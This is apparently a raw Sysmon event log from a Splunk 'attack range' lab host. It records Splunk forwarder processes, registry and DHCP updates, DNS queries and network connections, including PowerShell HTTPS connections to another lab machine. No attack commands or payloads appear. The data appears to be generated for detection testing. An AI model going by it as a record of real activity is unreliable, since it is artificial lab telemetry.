10341000x800000000000000035085699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.911{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.603{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07421487ED66D4099696AAAC244B13C9,SHA256=051A16AF05742B3A7360D2F6FA7A86F9FF59F262B36BE165A5E9286B5BE50BE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.409{B81B27B7-4F8C-613A-6F90-03000000C801}42204780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.241{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.041{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5F4536D9CADE4FBA4DF0E27C388CE6EE,SHA256=65CD984BBF241B7E385A7A88F8AB35CB298E75C42EAB02383EBAE669305AACD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2430B48CBBF039C08C685F7D2E7A0F9,SHA256=25DE01DB5ED9C4A30EDF3DDE51902A8C63BEA31E78C4616D4579FDBBEDC67BB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D2458A9118856FE824450620C91DA653,SHA256=017DCA6AF17E2B6AF81AC7D4AFE73481D6F12C388FE89498147B4B296204AA9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.263{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17F996CD8A5C2E5911B4DC962CEDCE58,SHA256=03A94A3D1DF895E61A0FE75DD08FB777F09109437D481228379C804872B73AAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.805{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local56758-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.037{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local56757-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.028{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local56756-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:08.952{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56755-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 13241300x800000000000000035085730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000035085729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\StaleAdapterDWORD (0x00000000) 13241300x800000000000000035085728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\CompartmentIdDWORD (0x00000001) 13241300x800000000000000035085727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\FlagsDWORD (0x00000002) 13241300x800000000000000035085726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\TtlDWORD (0x000004b0) 13241300x800000000000000035085725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\SentPriUpdateToIpBinary Data 13241300x800000000000000035085724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\SentUpdateToIpBinary Data 13241300x800000000000000035085723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\DnsServersBinary Data 13241300x800000000000000035085722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\HostAddrsBinary Data 13241300x800000000000000035085721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\PrimaryDomainNameattackrange.local 13241300x800000000000000035085720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\AdapterDomainName(Empty) 13241300x800000000000000035085719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\Hostnamewin-host-987 13241300x800000000000000035085718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000035085717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 22542200x800000000000000035085716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.027{B81B27B7-4F1A-613A-5B90-03000000C801}6804win-dc-128.attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\wbem\WmiPrvSE.exe 13241300x800000000000000035085715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000035085714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\AddressTypeDWORD (0x00000000) 13241300x800000000000000035085713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseTerminatesTimeDWORD (0x613a5d9c) 13241300x800000000000000035085712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\T2DWORD (0x613a5bda) 13241300x800000000000000035085711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\T1DWORD (0x613a5694) 13241300x800000000000000035085710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseObtainedTimeDWORD (0x613a4f8c) 13241300x800000000000000035085709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseDWORD (0x00000e10) 13241300x800000000000000035085708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpServer10.0.1.1 13241300x800000000000000035085707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpSubnetMask255.255.255.0 13241300x800000000000000035085706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpIPAddress10.0.1.15 13241300x800000000000000035085705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpInterfaceOptionsBinary Data 23542300x800000000000000035085740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:46.725{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60D4FDEC4CC3A0DAAB00A7A9B8932CAE,SHA256=0689FCEDF44C8D2A417A3E41568DFB11B401E400F278CD7965B6AE4E0F0244AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.019{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.us-west-2.compute.internal67bootps 354300x800000000000000035085738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:10.667{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56759-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:47.742{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B038FCAF64A22C0340A06ECEBB9973,SHA256=0548317948ABCE9882D1CC8D67E3469CBF3765968CC85B58471A9EE093C564F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.038{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse239.255.255.250-1900ssdpfalse127.0.0.1win-host-987.attackrange.local65049- 354300x800000000000000035085742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.038{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse127.0.0.1win-host-987.attackrange.local65049-false239.255.255.250-1900ssdp 354300x800000000000000035085741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.038{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local65048-false239.255.255.250-1900ssdp 23542300x800000000000000035085745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:48.743{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 